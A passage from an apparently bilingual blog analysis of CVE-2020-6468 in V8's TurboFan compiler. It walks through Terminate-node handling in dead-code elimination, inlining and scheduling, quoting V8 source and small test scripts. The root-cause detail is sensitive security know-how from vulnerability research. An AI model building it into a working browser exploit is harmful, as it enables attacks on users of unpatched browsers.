   Star <span class="built_in">r2</span></span><br><span class="line"><span class="number">76</span> E&gt; <span class="number">0x11ce08250243</span> @   <span class="number">17</span> : <span class="number">28</span> f9 <span class="number">01</span> <span class="number">03</span>       LdaNamedProperty <span class="built_in">r2</span>, [<span class="number">1</span>], [<span class="number">3</span>]</span><br><span class="line">      <span class="number">0x11ce08250247</span> @   <span class="number">21</span> : <span class="number">26</span> fa             Star <span class="built_in">r1</span></span><br><span class="line"><span class="number">76</span> E&gt; <span class="number">0x11ce08250249</span> @   <span class="number">23</span> : <span class="number">59</span> fa f9 <span class="number">02</span> <span class="number">05</span>    CallProperty1 <span class="built_in">r1</span>, <span class="built_in">r2</span>, a0, [<span class="number">5</span>]</span><br><span class="line"><span class="number">50</span> S&gt; <span class="number">0x11ce0825024e</span> @   <span class="number">28</span> : <span class="number">25</span> fb             Ldar <span class="built_in">r0</span></span><br><span class="line">      <span class="number">0x11ce08250250</span> @   <span class="number">30</span> : 4c <span class="number">07</span>             <span class="keyword">Inc</span> [<span class="number">7</span>]</span><br><span class="line">      <span class="number">0x11ce08250252</span> @   <span class="number">32</span> : <span class="number">26</span> fb             Star <span class="built_in">r0</span></span><br><span class="line">      <span class="number">0x11ce08250254</span> @   <span class="number">34</span> : 8a 1e <span class="number">00</span>          JumpLoop [<span class="number">30</span>], [<span class="number">0</span>] (<span class="number">0x11ce08250236</span> @ <span class="number">4</span>) # note the JumpLoop here</span><br><span class="line">      <span 
class="number">0x11ce08250257</span> @   <span class="number">37</span> : <span class="number">0d</span>                LdaUndefined </span><br><span class="line"><span class="number">92</span> S&gt; <span class="number">0x11ce08250258</span> @   <span class="number">38</span> : ab                Return </span><br></pre></td></tr></table></figure><p>Inspecting the generated graph in Turbolizer shows that a Terminate node was indeed created during the BytecodeGraphBuilder phase:</p><p><img src="/2021/02/CVE-2020-6468/terminateNode.png" alt="img"></p></li></ul><h4 id="d-DeadCodeElimination优化">d. DeadCodeElimination Optimization</h4><p>DeadCodeElimination runs in several phases, <strong>including InliningPhase and TypedLoweringPhase</strong>, and removes dead code from the graph. Here we focus on only a few of its reduction functions.</p><h5 id="1-ReduceLoopOrMerge">1) ReduceLoopOrMerge</h5><p>As shown above, any loop in JS code produces a JumpLoop bytecode, which in turn produces a Terminate node.</p><p>During actual debugging, however, we found that after being created in the BytecodeGraphBuilder phase, the Terminate node <strong>can be removed by DeadCodeElimination in the inlining phase</strong>, if and only if the <strong>Loop node has exactly one live input</strong>.</p><p>The key reduction function for this node is ReduceLoopOrMerge:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span 
class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">DeadCodeElimination::ReduceLoopOrMerge</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// Count the live inputs and compact them to the front</span></span><br><span class="line">  <span class="type">int</span> live_input_count = <span class="number">0</span>;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">if</span> (live_input_count == <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Replace</span>(<span class="built_in">dead</span>());</span><br><span class="line">  <span class="comment">// If there is exactly **one** live input</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (live_input_count == <span class="number">1</span>) &#123;</span><br><span class="line">    NodeVector <span class="built_in">loop_exits</span>(zone_);</span><br><span class="line">    <span class="comment">// Iterate over all uses of the Loop node, i.e. its destination nodes</span></span><br><span class="line">    <span class="keyword">for</span> (Node* <span class="type">const</span> use : node-&gt;<span class="built_in">uses</span>()) &#123;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">      </span><br><span class="line">      <span class="comment">// Handle the Terminate node</span></span><br><span class="line">      &#125; <span class="keyword">else</span> <span class="keyword">if</span> (use-&gt;<span class="built_in">opcode</span>() == IrOpcode::kTerminate) &#123;</span><br><span class="line">        <span class="built_in">DCHECK_EQ</span>(IrOpcode::kLoop, node-&gt;<span class="built_in">opcode</span>());</span><br><span 
class="line">        <span class="comment">// Kill the Terminate node</span></span><br><span class="line">        <span class="built_in">Replace</span>(use, <span class="built_in">dead</span>());</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// Optimize away the current Loop node</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Replace</span>(node-&gt;<span class="built_in">InputAt</span>(<span class="number">0</span>));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Is there a way to keep the Loop node from being optimized away? Yes: <strong>call the function more times</strong> so that it <strong>accumulates more type feedback</strong> (one of the pitfalls when debugging!).</p><p>Take the following test case as an example:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">3</span>; a ++)</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span 
class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(opt_me);</span><br><span class="line"><span class="comment">// opt_me has been executed only a few times</span></span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(opt_me);</span><br><span class="line"><span class="title function_">opt_me</span>();</span><br></pre></td></tr></table></figure><p>This produces the graph below. Note that the Loop node has only one input, so as soon as DeadCodeElimination visits the Loop node, it <strong>immediately eliminates</strong> the Terminate node.</p><p><img src="/2021/02/CVE-2020-6468/looplittle.png" alt="img"></p><p>If we instead run the target function a few more times, i.e.:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">3</span>; a ++)</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(opt_me);</span><br><span class="line"><span class="comment">// Run it 22 more times here</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span 
class="number">0</span>; a &lt; <span class="number">22</span>; a++)</span><br><span class="line">    <span class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(opt_me);</span><br><span class="line"><span class="title function_">opt_me</span>();</span><br></pre></td></tr></table></figure><p>那么就会产生以下大相径庭的图，其中 Loop 又多了一个 JSCall 的 input，因此 terminate 结点将在执行完 inlinePhase 后被保留：</p><p><img src="/2021/02/CVE-2020-6468/loopmany.png" alt="img"></p><h5 id="2-ReduceDeoptimizeOrReturnOrTerminateOrTailCall">2) ReduceDeoptimizeOrReturnOrTerminateOrTailCall</h5><p>Terminate 结点只有两个 input ，分别是 EffectPhi (Effect Node) 以及 Loop 结点 (Control Node)。</p><p>该函数对 Terminate 结点的优化较为简单：若当前结点存在 dead input，则只重设了该结点的 input，并设置 opcode 为 <code>kThrow</code>，即<strong>将当前 Terminate 结点更新为 Throw 结点</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// 如果当前结点存在 dead input</span></span><br><span class="line"> 
 <span class="keyword">if</span> (<span class="built_in">FindDeadInput</span>(node) != <span class="literal">nullptr</span>) &#123;</span><br><span class="line">    Node* effect = NodeProperties::<span class="built_in">GetEffectInput</span>(node, <span class="number">0</span>);</span><br><span class="line">    Node* control = NodeProperties::<span class="built_in">GetControlInput</span>(node, <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// Reset the inputs of the current node</span></span><br><span class="line">    node-&gt;<span class="built_in">TrimInputCount</span>(<span class="number">2</span>);</span><br><span class="line">    node-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">0</span>, effect);</span><br><span class="line">    node-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">1</span>, control);</span><br><span class="line">    <span class="comment">// Change the op to kThrow</span></span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">common</span>()-&gt;<span class="built_in">Throw</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="e-JSInliningHeuristic-优化">e. 
JSInliningHeuristic Optimization</h4><ul><li><p>JSInliningHeuristic runs in <strong>InliningPhase</strong> and inlines functions that are eligible for inlining.</p></li><li><p><code>JSInliningHeuristic::Reduce</code> checks the type of the node it receives. If it is a <code>JSCall</code> or <code>JSConstruct</code> node, further checks follow, and the node is finally added to the candidates_ set. Reduce only <strong>collects the set of functions to be inlined</strong>; the actual inlining happens in Finalize.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">JSInliningHeuristic::Reduce</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="function">DisallowHeapAccessIf <span class="title">no_heap_acess</span><span class="params">(broker()-&gt;is_concurrent_inlining())</span></span>;</span><br><span class="line">  <span class="comment">// check1: is the current node a JSCall or JSConstruct node?</span></span><br><span class="line">  <span class="keyword">if</span> (!IrOpcode::<span class="built_in">IsInlineeOpcode</span>(node-&gt;<span class="built_in">opcode</span>())) <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line"></span><br><span 
class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// check2: Check if the &#123;node&#125; is an appropriate candidate for inlining.</span></span><br><span class="line">  Candidate candidate = <span class="built_in">CollectFunctions</span>(node, kMaxCallPolymorphism);</span><br><span class="line">  <span class="keyword">if</span> (candidate.num_functions == <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (candidate.num_functions &gt; <span class="number">1</span> &amp;&amp; !FLAG_polymorphic_inlining) &#123;</span><br><span class="line">    <span class="built_in">TRACE</span>(<span class="string">&quot;Not considering call site #&quot;</span></span><br><span class="line">          &lt;&lt; node-&gt;<span class="built_in">id</span>() &lt;&lt; <span class="string">&quot;:&quot;</span> &lt;&lt; node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">mnemonic</span>()</span><br><span class="line">          &lt;&lt; <span class="string">&quot;, because polymorphic inlining is disabled&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line">    </span><br><span class="line">  <span class="comment">// The remaining checks are minor and almost always pass</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// Add the current node to the candidates_ set</span></span><br><span class="line">  candidates_.<span class="built_in">insert</span>(candidate);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>要想将一个目标的内联函数加入至 candidates_ 集合中，最少要通过 Reduce 函数中的两个关键 check：</p><ul><li>当前结点为 JSCall 或 JSConstruct。</li><li>当前结点的 Callee（即 input[0]）为 Phi 或 JSCreateClosure，并满足一些条件。</li></ul><p>如果目标函数执行的次数较多，即 <code>Feedback Is Sufficient</code>，那么每个 call 都会生成一个 JSCall 结点，同时第二个 check 也会被通过；但如果<strong>目标函数执行的次数较少</strong>（这种情况尤为发生在调试时），那么 JSCall 结点就不会被插入至图中，更别说通过第二个 Check 了。</p><p>以下阐述了<strong>目标函数执行情况</strong> 对 <strong>产生 JSCall 结点</strong>之间的影响，我们先写一段 test case：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">test</span>(<span class="params"></span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">3</span>; a ++)</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">test</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span 
class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(opt_me);</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">22</span>; a++)</span><br><span class="line">    <span class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(opt_me);</span><br><span class="line"><span class="title function_">opt_me</span>();</span><br></pre></td></tr></table></figure><p>Dumping the bytecode of opt_me shows that the call to test corresponds to the <code>CallUndefinedReceiver0</code> bytecode, so the call chain that builds the JSCall node is:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitCallUndefinedReceiver0</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildCall</span><span class="params">(ConvertReceiverMode receiver_mode, std::initializer_list&lt;Node*&gt; args, <span class="type">int</span> slot_id)</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildCall</span><span class="params">(ConvertReceiverMode receiver_mode, Node* <span class="type">const</span>* args, <span class="type">size_t</span> arg_count, <span class="type">int</span> slot_id)</span></span></span><br></pre></td></tr></table></figure><p>The source of the innermost <code>BuildCall</code> overload is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildCall</span><span class="params">(ConvertReceiverMode receiver_mode,</span></span></span><br><span class="line"><span class="params"><span class="function">                                     Node* <span class="type">const</span>* args, <span class="type">size_t</span> arg_count,</span></span></span><br><span class="line"><span class="params"><span class="function">                                     <span class="type">int</span> slot_id)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ..</span></span><br><span class="line">  <span class="comment">// Create the JSCall operator</span></span><br><span class="line">  <span class="type">const</span> Operator* op =</span><br><span class="line">      <span class="built_in">javascript</span>()-&gt;<span class="built_in">Call</span>(arg_count, frequency, feedback, receiver_mode,</span><br><span class="line">                         speculation_mode, CallFeedbackRelation::kRelated);</span><br><span class="line">  <span class="comment">// Key step: perform JSTypeHintLowering</span></span><br><span class="line">  JSTypeHintLowering::LoweringResult lowering = <span class="built_in">TryBuildSimplifiedCall</span>(</span><br><span class="line">      
op, args, <span class="built_in">static_cast</span>&lt;<span class="type">int</span>&gt;(arg_count), feedback.slot);</span><br><span class="line">  <span class="comment">// If JSTypeHintLowering bails out (IsExit), no JSCall node is inserted</span></span><br><span class="line">  <span class="keyword">if</span> (lowering.<span class="built_in">IsExit</span>()) <span class="keyword">return</span>;</span><br><span class="line">  <span class="comment">// Once execution reaches here, the JSCall node will generally be inserted into the graph</span></span><br><span class="line">  Node* node = <span class="literal">nullptr</span>;</span><br><span class="line">  <span class="keyword">if</span> (lowering.<span class="built_in">IsSideEffectFree</span>()) &#123;</span><br><span class="line">    node = lowering.<span class="built_in">value</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="built_in">DCHECK</span>(!lowering.<span class="built_in">Changed</span>());</span><br><span class="line">    node = <span class="built_in">ProcessCallArguments</span>(op, args, <span class="built_in">static_cast</span>&lt;<span class="type">int</span>&gt;(arg_count));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">environment</span>()-&gt;<span class="built_in">BindAccumulator</span>(node, Environment::kAttachFrameState);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>We see that the JSCall node is inserted into the graph only when the result of TryBuildSimplifiedCall does not satisfy IsExit. Tracing further shows that IsExit is <strong>not satisfied</strong> only when the function has sufficient feedback, in which case the JSCall node is inserted.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span 
class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Node* <span class="title">JSTypeHintLowering::TryBuildSoftDeopt</span><span class="params">(FeedbackSlot slot, Node* effect,</span></span></span><br><span class="line"><span class="params"><span class="function">                                            Node* control,</span></span></span><br><span class="line"><span class="params"><span class="function">                                            DeoptimizeReason reason)</span> <span class="type">const</span> </span>&#123;</span><br><span class="line">  <span class="keyword">if</span> (!(<span class="built_in">flags</span>() &amp; kBailoutOnUninitialized)) <span class="keyword">return</span> <span class="literal">nullptr</span>;</span><br><span class="line"></span><br><span class="line">  <span class="function">FeedbackSource <span class="title">source</span><span class="params">(feedback_vector(), slot)</span></span>;</span><br><span class="line">  <span class="comment">// If feedback is insufficient, keep going; otherwise return nullptr and **decline** to produce LoweringResult::Exit</span></span><br><span class="line">  <span class="keyword">if</span> (!<span class="built_in">broker</span>()-&gt;<span class="built_in">FeedbackIsInsufficient</span>(source)) <span class="keyword">return</span> <span class="literal">nullptr</span>;</span><br><span class="line">  <span class="comment">// The nodes below are generated for the insufficient-feedback case; note that this is the case we want to avoid</span></span><br><span class="line">  Node* deoptimize = <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(</span><br><span class="line">      <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">common</span>()-&gt;<span 
class="built_in">Deoptimize</span>(DeoptimizeKind::kSoft, reason,</span><br><span class="line">                                      <span class="built_in">FeedbackSource</span>()),</span><br><span class="line">      <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">Dead</span>(), effect, control);</span><br><span class="line">  Node* frame_state =</span><br><span class="line">      NodeProperties::<span class="built_in">FindFrameStateBefore</span>(deoptimize, <span class="built_in">jsgraph</span>()-&gt;<span class="built_in">Dead</span>());</span><br><span class="line">  deoptimize-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">0</span>, frame_state);</span><br><span class="line">  <span class="keyword">return</span> deoptimize;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>In summary, the JSCall node is inserted into the graph normally only after the function has been called enough times, which lays the groundwork for inlining the target function later.</p><p><img src="/2021/02/CVE-2020-6468/jscall.png" alt="img"></p></li><li><p><code>JSInliningHeuristic::Finalize</code> does something simple: it takes nodes out of the candidates_ set and inlines them:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span 
class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">JSInliningHeuristic::Finalize</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="function">DisallowHeapAccessIf <span class="title">no_heap_acess</span><span class="params">(broker()-&gt;is_concurrent_inlining())</span></span>;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (candidates_.<span class="built_in">empty</span>()) <span class="keyword">return</span>;  <span class="comment">// Nothing to do without candidates.</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// We inline at most one candidate in every iteration of the fixpoint.</span></span><br><span class="line">  <span class="comment">// This is to ensure that we don&#x27;t consume the full inlining budget</span></span><br><span class="line">  <span class="comment">// on things that aren&#x27;t called very often.</span></span><br><span class="line">  <span class="comment">// TODO(bmeurer): Use std::priority_queue instead of std::set here.</span></span><br><span class="line">  <span class="keyword">while</span> (!candidates_.<span class="built_in">empty</span>()) &#123;</span><br><span class="line">    <span class="keyword">auto</span> i = candidates_.<span class="built_in">begin</span>();</span><br><span class="line">    Candidate candidate = *i;</span><br><span class="line">    candidates_.<span class="built_in">erase</span>(i);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Check whether the function being inlined is dead code</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span 
class="comment">// Enforce limits on the target function&#x27;s size and on the total size already inlined</span></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/*</span></span><br><span class="line"><span class="comment">      All checks passed, start inlining...</span></span><br><span class="line"><span class="comment">      InlineCandidate expands the JSCall/JSConstruct node with the subgraph of another function.</span></span><br><span class="line"><span class="comment">    */</span></span><br><span class="line">    Reduction <span class="type">const</span> reduction = <span class="built_in">InlineCandidate</span>(candidate, <span class="literal">false</span>);</span><br><span class="line">    <span class="keyword">if</span> (reduction.<span class="built_in">Changed</span>()) <span class="keyword">return</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The <code>InlineCandidate</code> function called from <code>JSInliningHeuristic::Finalize</code> <strong>expands the current JSCall/JSConstruct node with the subgraph of another function</strong>.</p><p>Two points matter in this whole <strong>inline a function into the graph</strong> operation:</p><ul><li>The graph of the other function is built directly inside <code>InlineCandidate</code> by BytecodeGraphBuilder, so none of the nodes in the new graph <strong>have gone through any optimization yet</strong>.</li><li>In addition, because the GraphReducer is already in its Finalize stage at this point, the newly added nodes are not processed by DeadCodeElimination (note that <strong>this refers to the DeadCodeElimination inside inliningPhase</strong>).</li></ul><p>As a result, the Loop &amp; Terminate nodes of the other function are all preserved, meaning the graph that comes out of inliningPhase can still contain Loop &amp; Terminate nodes.</p><p><img src="/2021/02/CVE-2020-6468/loop_terminate.png" alt="img"></p></li></ul><h4 id="f-Schedule-AddThrow函数">f. 
Schedule::AddThrow function</h4><ul><li><p>In the JIT, EffectControlLinearizationPhase mainly does the following:</p><ul><li>Create a <code>Scheduler</code></li><li>Use the <code>Scheduler</code> to rebuild the control chain and the effect chain</li><li>During the rebuild, optimize some operations and wire them into the control/effect chain.</li></ul><p>In other words, <strong>the logic that rebuilds the control chain and the effect chain lives in the <code>Scheduler</code> class</strong>.</p></li><li><p>The AddThrow function can be reached through the following call chain:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">bool</span> <span class="title">PipelineImpl::OptimizeGraph</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">  <span class="type">void</span> <span class="title">EffectControlLinearizationPhase::Run</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    Schedule* <span class="title">Scheduler::ComputeSchedule</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">      <span class="type">void</span> <span class="title">Scheduler::BuildCFG</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">CFGBuilder::Run</span><span class="params">()</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">CFGBuilder::ConnectBlocks</span><span class="params">(Node* node)</span></span></span><br><span class="line"><span class="function">            <span class="type">void</span> <span class="title">CFGBuilder::ConnectThrow</span><span class="params">(Node* thr)</span></span></span><br><span class="line"><span 
class="function">              <span class="type">void</span> <span class="title">Schedule::AddThrow</span><span class="params">(...)</span></span></span><br></pre></td></tr></table></figure><p>While building the CFG, the Scheduler walks the control nodes. When it reaches an <code>IrOpcode::kThrow</code> node, it does the following:</p><ol><li><p>Get the control node of the throw node, throw_control.</p></li><li><p>Get the predecessor basic block of that control node, throw_block.</p></li><li><p>Set the <strong>type of the terminating control-flow node</strong> of throw_block to <code>BasicBlock::kThrow</code>.</p><blockquote><p>That is, the type of the <strong>control-flow node at the end that terminates the basic block</strong> is set to <code>BasicBlock::kThrow</code>.</p></blockquote></li><li><p>Set the <strong>control input</strong> of the throw_block basic block to the current kThrow node.</p><blockquote><p>This control input should be the last node of the basic block.</p></blockquote></li></ol><blockquote><p>In summary, if a throw control-flow node is reached while building the CFG, the Scheduler will:</p><ol><li>Get the predecessor basic block of the throw control-flow node</li><li>Set the type of the control-flow node at the end of that basic block, and set its control input</li></ol><p>Note that control-flow edges between basic blocks point <strong>from back to front</strong>, which is why the throw control-flow node ends up updating the last node of its predecessor basic block (see the third reference link).</p></blockquote></li></ul><h3 id="2-关键点">2. Key Points</h3><ul><li><p><code>DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall</code> handles Terminate nodes: if a Terminate node has a dead input, it is <strong>replaced with a Throw node</strong>. <strong>Because a Terminate node is not part of the actual control flow</strong>, replacing it with a Throw node causes problems.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 